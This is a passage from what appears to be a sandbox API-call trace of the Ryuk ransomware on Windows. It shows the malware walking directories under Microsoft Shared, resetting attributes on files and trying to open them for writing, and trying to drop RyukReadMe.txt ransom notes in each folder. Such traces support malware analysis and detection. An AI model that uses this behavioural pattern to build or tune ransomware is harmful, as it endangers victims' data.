"c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.804] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.804] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.805] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.805] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX", dwFileAttributes=0x80) returned 0 [0131.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.805] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.805] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.805] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.805] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX", dwFileAttributes=0x80) returned 0 [0131.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.806] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.806] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.806] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.806] SetLastError (dwErrCode=0x0) [0131.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.806] GetLastError () returned 0x5 [0131.806] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.806] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.806] SetLastError (dwErrCode=0x0) [0131.807] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.807] GetLastError () returned 0x5 [0131.807] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.807] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.807] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.808] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.808] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.808] SetLastError (dwErrCode=0x0) [0131.808] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.808] GetLastError () returned 0x5 [0131.808] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.808] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.808] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.809] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.809] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.809] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.809] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM", dwFileAttributes=0x80) returned 0 [0131.809] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.809] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.810] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.810] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.810] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.810] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.810] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.810] SetLastError (dwErrCode=0x0) [0131.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.810] GetLastError () returned 0x5 [0131.810] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.810] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.810] SetLastError (dwErrCode=0x0) [0131.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.810] GetLastError () returned 0x5 [0131.810] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.810] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.810] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.811] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.811] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.811] SetLastError (dwErrCode=0x0) [0131.811] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.811] GetLastError () returned 0x5 [0131.811] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.811] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.811] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.811] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.812] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.812] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML", dwFileAttributes=0x80) returned 0 [0131.812] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.812] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.812] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.812] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.812] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML", dwFileAttributes=0x80) returned 0 [0131.812] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.813] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.813] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.813] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.813] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT", dwFileAttributes=0x80) returned 0 [0131.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.814] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.814] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.814] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML", dwFileAttributes=0x80) returned 0 [0131.814] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.814] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.814] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.814] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML", dwFileAttributes=0x80) returned 0 [0131.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.815] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.815] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.815] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.815] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.815] SetLastError (dwErrCode=0x0) [0131.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.816] GetLastError () returned 0x5 [0131.816] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.816] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.816] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.816] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL", dwFileAttributes=0x80) returned 0 [0131.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.816] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.816] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.816] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.816] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.816] SetLastError (dwErrCode=0x0) [0131.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.817] GetLastError () returned 0x5 [0131.817] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.817] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.817] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.817] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.817] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.817] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT", dwFileAttributes=0x80) returned 0 [0131.817] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.818] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.818] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.818] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.818] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.818] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.818] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB", dwFileAttributes=0x80) returned 0 [0131.818] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mstag.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.819] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.819] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.819] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.819] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.819] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.819] SetLastError (dwErrCode=0x0) [0131.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.819] GetLastError () returned 0x5 [0131.819] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.819] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.819] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.819] SetLastError (dwErrCode=0x0) [0131.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.819] GetLastError () returned 0x5 [0131.819] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.819] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.819] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.820] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.820] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.820] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.820] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.820] SetLastError (dwErrCode=0x0) [0131.820] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.821] GetLastError () returned 0x5 [0131.821] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.821] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.821] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.821] SetLastError (dwErrCode=0x0) [0131.821] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.821] GetLastError () returned 0x5 [0131.821] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.821] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.821] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.823] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.823] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.823] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.823] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm", dwFileAttributes=0x80) returned 0 [0131.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.824] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.824] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.824] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.824] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg", dwFileAttributes=0x80) returned 0 [0131.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.825] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.825] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.825] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.825] 